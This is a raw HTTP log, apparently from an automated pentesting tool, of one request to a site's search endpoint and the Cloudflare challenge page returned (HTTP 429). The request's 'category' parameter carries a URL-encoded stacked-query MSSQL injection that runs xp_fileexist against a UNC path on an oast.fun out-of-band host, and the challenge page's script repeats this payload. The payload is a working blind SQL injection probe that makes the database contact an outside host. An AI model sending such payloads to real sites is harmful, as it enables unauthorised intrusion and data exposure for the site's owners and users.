REQUEST:
GET https://my.myfirst.tech/search?category=%27%3B%20DECLARE%20%40q%20VARCHAR%2899%29%3B%20SET%20%40q%3D%27%5C%5Ch0cqg45t8jh21623dc0z89uhe68k4sj2t.oast.fun%5Ca%27%3B%20EXEC%20master.dbo.xp_fileexist%20%40q%3B--%20-
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9905
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c847726f77a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=0BzlTouf6y8MpyzK59d1CjBJGSg2k89xf7mRnIaN%2BPIcFkbHmyTjIr%2F3jIibHqY1%2Fm%2FO1qaa0qy7ybJgMumRqxP4WL8ceFNdgLAtlpsqCpHxWWqJGHcnfxEbfdXG7i2jXPEptRG460Gu%2Ff4wIg%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c847726f77a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'q.GSUC6EQJKYZGMR58kNgvYPJSr7zgodUcn7NbqcEFM-1784281162-1.2.1.1-CrfOuEElLiLNjh5W40BIxg5YQL6GkI.RD.7Yg9mtQDUWwqJAurKQwbZ0ZXjNqNuY',cITimeS: '1784281162',cRay: 'a1c847726f77a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?category=%27%3B+DECLARE+%40q+VARCHAR%2899%29%3B+SET+%40q%3D%27%5C%5Ch0cqg45t8jh21623dc0z89uhe68k4sj2t.oast.fun%5Ca%27%3B+EXEC+master.dbo.xp_fileexist+%40q%3B--+-\u0026__cf_chl_tk=6VqPAKBJ6qw.8g9CRxNIeGmze_ZRgUJpJqXSMutt5RI-1784281162-1.0.1.1-W2ZRhrTvjAh6uXGoDFQoAr7346uDMawcjeA30hApAuA",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?category=%27%3B+DECLARE+%40q+VARCHAR%2899%29%3B+SET+%40q%3D%27%5C%5Ch0cqg45t8jh21623dc0z89uhe68k4sj2t.oast.fun%5Ca%27%3B+EXEC+master.dbo.xp_fileexist+%40q%3B--+-\u0026__cf_chl_f_tk=6VqPAKBJ6qw.8g9CRxNIeGmze_ZRgUJpJqXSMutt5RI-1784281162-1.0.1.1-W2ZRhrTvjAh6uXGoDFQoAr7346uDMawcjeA30hApAuA",md: 'hVN26B8xCLTJxFSLTRqbU570DEI_VkqEJLmdK3BNgf8-1784281162-1.2.1.1-tqfEtCa46S4GivvPQw1xfKS3lMuXWhh2wJ3g5FLecloKljigwHYuccyw.LQ8h94sa1jonaJjgqwfRoY6jpSibvJiQwG.4YzQwW8oDYXhOGApMzIgH85jzL5ocgh5a6jANarhVczTCftm9hTwcLauCAxBU.67sYQII6GrTOh.SeccwXKmDTabMOmdrHB79FufD7hen1JYfI5A31D.u9KkScr69yIBJ5ZKUb7VAobGs_uW96iK4oNyBlEaNMohJN4anw1d1rjmYJF3tb.JCQ5W3.kc7N7fSKXbUG9n1qay6Z1tzYiPaIF1MMgMAbQ8eCHEYs7x7OaGdvVFaaqMAVXCSCcrHVbVY_keNIdKSA7DG0BlfeE3oojj2hRvdUxAzfSrLirQ03tXTQpumwt9fbjyq9p8nyEXPULCT1kDaGAtQKZZD0m7iQYlFlEe19YkN_.m.26I1t1Vq9d07dQyG64n4q4Ls5ccPkEUFnoIYO1xHOhdV3_B34.kvRmvBOjHUwl44Ab845CdtIjgNsce_.wmIaL5.VGlMEsrJokE0wiMEIb_sXLPirbtaPsn_vWp.xPgAelguuehG5EcXQE8yk6uPovJJRQ3zwVY0KcZiCFGxYwug9RYeR7cLjzD.gJkh7JBlALwTMf57_R1h7HwZVyCEnZsh9gmvAD1WLWuzu2_Py3J_10_ZOy0.NqNYhbsp8Y0VK9bQ4gmUz9_Jq4tkTCN19GR9XuG1s2GCf_UORwdPhvOQjK4rNMM1fcjoBDRopWrGNy.VFHnp2prG2.bXZwbNR0Ff6XP016z1Iw.CLrRmVJjBkFSspcfUeWYw8z.A6iS74ZM7Ezq3WjWlCLuAs7jAsbpMYDcErLLsptAOcxP_9j7mWkZ3l5aGSbkjDubq8K5W3sESBbCsKuhQc81io4e7E0ToIDTsZp.43HEcPWdSQx5.Z9lghwjqwO6NcuUFMrqB2kdM75EChRe3WTFyZlTnZmrsDnxT3lhvQmP52.EL4cer3YLFfvmSzTBWpZfIxfVSTHDujCXFcQ5yKtXZET79XhEia2wwHUmSKnymLzF_4uNKvC6vqQ39rxrKsiyhgJC6B4wgGY_x7OdN3NwG_KZfmxl1xYA.7A0qoS4H9QjDHtRsslya4PceZ5Uoq0oRp4NQFWMPgS09adVTBKaBEEHsAKlqns8MWU6D9PzEOEPE3Z1yDNFCOE7dtS3fHBV8bQanJOqFy_ZhgTKgZbMlU8_VlV4D6zTxEOz4dj4Wza9uaZwYzFkX8VNKUMC3opRTyBQkhb0JyXi9tbi6jsHU13wE7xcgGpvN5RlXWOVBkmh7336UZMR3sbsmrLifIvvQN2JSq4th4Nf5gm5Mgq0xbwvfZHsBNaS_dwc.KxcJ8lnnzA',mdrd: 'pOS6kowLdQj0laW.hUHgMZ2pXitKNZtMuU5PSd2flJM-1784281162-1.2.1.1-1a6qqFe9._Xj2uvok3XVZ9rndWfbFlTKzR6xbznCqWXeH8vYAQkaO07CaATFWxVkcWb2ge4l92QkwzXkiWnsNdhXlvk3oKDli8N9FLf2UD1A9RgIGmNRJp_FZbWQR42bHOgPIgAwoXfAER1sY9rg3Rl_8BCk0yzc_NkFJelkB_potyMuINTtLB39Q78eFgtJG3DjqY5koH8MKOyBpVLu34Q8bbJCJQecv0V9q2Ax3KwSaaaTds4jUA4AnVyi5Cgp',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c847726f77a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?category=%27%3B+DECLARE+%40q+VARCHAR%2899%29%3B+SET+%40q%3D%27%5C%5Ch0cqg45t8jh21623dc0z89uhe68k4sj2t.oast.fun%5Ca%27%3B+EXEC+master.dbo.xp_fileexist+%40q%3B--+-\u0026__cf_chl_rt_tk=6VqPAKBJ6qw.8g9CRxNIeGmze_ZRgUJpJqXSMutt5RI-1784281162-1.0.1.1-W2ZRhrTvjAh6uXGoDFQoAr7346uDMawcjeA30hApAuA"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
